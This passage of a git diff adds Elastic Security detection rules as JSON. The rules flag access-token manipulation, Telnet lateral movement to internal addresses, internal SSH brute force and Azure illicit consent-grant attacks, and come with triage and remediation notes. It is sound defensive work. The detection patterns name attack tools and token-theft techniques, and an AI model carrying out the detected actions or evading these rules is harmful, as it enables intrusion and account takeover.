\"msbuild.exe\", \"esentutl.exe\") or\n\n ((process.Ext.relative_file_creation_time <= 900 or process.Ext.relative_file_name_modify_time <= 900) and\n not process.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n not process.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ) and\n not (process.name : \"rundll32.exe\" and\n process.command_line : (\"*davclnt.dll,DavSetCookie*\", \"*?:\\\\Program Files*\",\n \"*\\\\Windows\\\\System32\\\\winethc.dll*\", \"*\\\\Windows\\\\SYSTEM32\\\\EDGEHTML.dll*\",\n \"*shell32.dll,SHCreateLocalServerRunDll*\")) and\n not startswith~(process.Ext.effective_parent.name, process.parent.name) and \n not (process.name : \"powershell.exe\" and process.parent.name : \"wmiprvse.exe\" and process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\RuntimeBroker.exe\" and process.parent.executable : \"?:\\\\Windows\\\\System32\\\\sihost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\sethc.exe\" and process.parent.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\" and \n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\twain_32\\\\*.exe\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1b0b4818-5655-409b-9c73-341cac4bb73f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + }, + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "1b0b4818-5655-409b-9c73-341cac4bb73f_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_107.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_107.json new file mode 100644 index 00000000000..8650bc488e4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_107.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses.", + "false_positives": [ + "Telnet can be used for both benign or malicious purposes. Telnet is included by default in some Linux distributions, so its presence is not inherently suspicious. The use of Telnet to manage devices remotely has declined in recent years in favor of more secure protocols such as SSH. Telnet usage by non-automated tools or frameworks may be suspicious." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Internal Network via Telnet", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and process.name == \"telnet\" and event.type == \"start\"]\n [network where host.os.type == \"linux\" and process.name == \"telnet\" and cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\", \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n ]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1b21abcc-4d9f-4b08-a7f5-316f5f94b973", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "1b21abcc-4d9f-4b08-a7f5-316f5f94b973_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_10.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_10.json new file mode 100644 index 00000000000..3ce208e2a92 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_10.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts.", + "from": "now-9m", + "index": [ + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 5, + "name": "Potential Internal Linux SSH Brute Force Detected", + "note": "## Triage and analysis\n\n### Investigating Potential Internal Linux SSH Brute Force Detected\n\nThe rule identifies consecutive internal SSH login failures targeting a user account from the same source IP address to the same target host indicating brute force login attempts.\n\n#### Possible investigation steps\n\n- Investigate the login failure user name(s).\n- Investigate the source IP address of the failed ssh login attempt(s).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Infrastructure or availability issue.\n\n### Related Rules\n\n- Potential External Linux SSH Brute Force Detected - fa210b61-b627-4e5e-86f4-17e8270656ab\n- Potential SSH Password Guessing - 8cb84371-d053-4f4f-bce0-c74990e28f28\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, source.ip, user.name with maxspan=15s\n [ authentication where host.os.type == \"linux\" and \n event.action in (\"ssh_login\", \"user_login\") and event.outcome == \"failure\" and\n cidrmatch(source.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \n \"::1\", \"FE80::/10\", \"FF00::/8\") ] with runs = 10\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c27fa22-7727-4dd3-81c0-de6da5555feb", + "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 10 + }, + "id": "1c27fa22-7727-4dd3-81c0-de6da5555feb_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_107.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_107.json new file mode 100644 index 00000000000..19c7eb5748e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_107.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user grants permissions to an Azure-registered application or when an administrator grants tenant-wide permissions to an application. An adversary may create an Azure-registered application that requests access to data such as contact information, email, or documents.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-azure*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Possible Consent Grant Attack via Azure-Registered Application", + "note": "## Triage and analysis\n\n### Investigating Possible Consent Grant Attack via Azure-Registered Application\n\nIn an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting that application consent to access their data either through a phishing attack, or by injecting illicit code into a trusted website. After the illicit application has been granted consent, it has account-level access to data without the need for an organizational account. Normal remediation steps like resetting passwords for breached accounts or requiring multi-factor authentication (MFA) on accounts are not effective against this type of attack, since these are third-party applications and are external to the organization.\n\nOfficial Microsoft guidance for detecting and remediating this attack can be found [here](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants).\n\n#### Possible investigation steps\n\n- From the Azure AD portal, Review the application that was granted permissions:\n - Click on the `Review permissions` button on the `Permissions` blade of the application.\n - An app should require only permissions related to the app's purpose. If that's not the case, the app might be risky.\n - Apps that require high privileges or admin consent are more likely to be risky.\n- Investigate the app and the publisher. The following characteristics can indicate suspicious apps:\n - A low number of downloads.\n - Low rating or score or bad comments.\n - Apps with a suspicious publisher or website.\n - Apps whose last update is not recent. This might indicate an app that is no longer supported.\n- Export and examine the [Oauth app auditing](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#oauth-app-auditing) to identify users affected.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Malicious applications abuse the same workflow used by legitimate apps. Thus, analysts must review each app consent to ensure that only desired apps are granted access.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Disable the malicious application to stop user access and the application access to your data.\n- Revoke the application Oauth consent grant. The `Remove-AzureADOAuth2PermissionGrant` cmdlet can be used to complete this task.\n- Remove the service principal application role assignment. The `Remove-AzureADServiceAppRoleAssignment` cmdlet can be used to complete this task.\n- Revoke the refresh token for all users assigned to the application. Azure provides a [playbook](https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks/Revoke-AADSignInSessions) for this task.\n- [Report](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#send-feedback) the application as malicious to Microsoft.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Investigate the potential for data compromise from the user's email and file sharing services. Activate your Data Loss incident response playbook.\n- Disable the permission for a user to set consent permission on their behalf.\n - Enable the [Admin consent request](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) feature.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and\n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", + "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", + "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Operation", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 107 + }, + "id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_109.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_109.json new file mode 100644 index 00000000000..814f3a60363 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_109.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user grants permissions to an Azure-registered application or when an administrator grants tenant-wide permissions to an application. An adversary may create an Azure-registered application that requests access to data such as contact information, email, or documents.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-azure*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Possible Consent Grant Attack via Azure-Registered Application", + "note": "## Triage and analysis\n\n### Investigating Possible Consent Grant Attack via Azure-Registered Application\n\nIn an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting that application consent to access their data either through a phishing attack, or by injecting illicit code into a trusted website. After the illicit application has been granted consent, it has account-level access to data without the need for an organizational account. Normal remediation steps like resetting passwords for breached accounts or requiring multi-factor authentication (MFA) on accounts are not effective against this type of attack, since these are third-party applications and are external to the organization.\n\nOfficial Microsoft guidance for detecting and remediating this attack can be found [here](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants).\n\n#### Possible investigation steps\n\n- From the Azure AD portal, Review the application that was granted permissions:\n - Click on the `Review permissions` button on the `Permissions` blade of the application.\n - An app should require only permissions related to the app's purpose. If that's not the case, the app might be risky.\n - Apps that require high privileges or admin consent are more likely to be risky.\n- Investigate the app and the publisher. The following characteristics can indicate suspicious apps:\n - A low number of downloads.\n - Low rating or score or bad comments.\n - Apps with a suspicious publisher or website.\n - Apps whose last update is not recent. This might indicate an app that is no longer supported.\n- Export and examine the [Oauth app auditing](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#oauth-app-auditing) to identify users affected.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Malicious applications abuse the same workflow used by legitimate apps. Thus, analysts must review each app consent to ensure that only desired apps are granted access.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Disable the malicious application to stop user access and the application access to your data.\n- Revoke the application Oauth consent grant. The `Remove-AzureADOAuth2PermissionGrant` cmdlet can be used to complete this task.\n- Remove the service principal application role assignment. The `Remove-AzureADServiceAppRoleAssignment` cmdlet can be used to complete this task.\n- Revoke the refresh token for all users assigned to the application. Azure provides a [playbook](https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks/Revoke-AADSignInSessions) for this task.\n- [Report](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#send-feedback) the application as malicious to Microsoft.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Investigate the potential for data compromise from the user's email and file sharing services. Activate your Data Loss incident response playbook.\n- Disable the permission for a user to set consent permission on their behalf.\n - Enable the [Admin consent request](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) feature.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and\n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", + "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", + "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Operation", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_111.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_111.json new file mode 100644 index 00000000000..9a1fb35b644 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_111.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user grants permissions to an Azure-registered application or when an administrator grants tenant-wide permissions to an application. An adversary may create an Azure-registered application that requests access to data such as contact information, email, or documents.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-azure*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Possible Consent Grant Attack via Azure-Registered Application", + "note": "## Triage and analysis\n\n### Investigating Possible Consent Grant Attack via Azure-Registered Application\n\nIn an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting that application consent to access their data either through a phishing attack, or by injecting illicit code into a trusted website. After the illicit application has been granted consent, it has account-level access to data without the need for an organizational account. Normal remediation steps like resetting passwords for breached accounts or requiring multi-factor authentication (MFA) on accounts are not effective against this type of attack, since these are third-party applications and are external to the organization.\n\nOfficial Microsoft guidance for detecting and remediating this attack can be found [here](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants).\n\n#### Possible investigation steps\n\n- From the Azure AD portal, Review the application that was granted permissions:\n - Click on the `Review permissions` button on the `Permissions` blade of the application.\n - An app should require only permissions related to the app's purpose. If that's not the case, the app might be risky.\n - Apps that require high privileges or admin consent are more likely to be risky.\n- Investigate the app and the publisher. The following characteristics can indicate suspicious apps:\n - A low number of downloads.\n - Low rating or score or bad comments.\n - Apps with a suspicious publisher or website.\n - Apps whose last update is not recent. This might indicate an app that is no longer supported.\n- Export and examine the [Oauth app auditing](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#oauth-app-auditing) to identify users affected.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Malicious applications abuse the same workflow used by legitimate apps. Thus, analysts must review each app consent to ensure that only desired apps are granted access.\n\n### Response and remediation\n\n- Initiate the incident response process based on 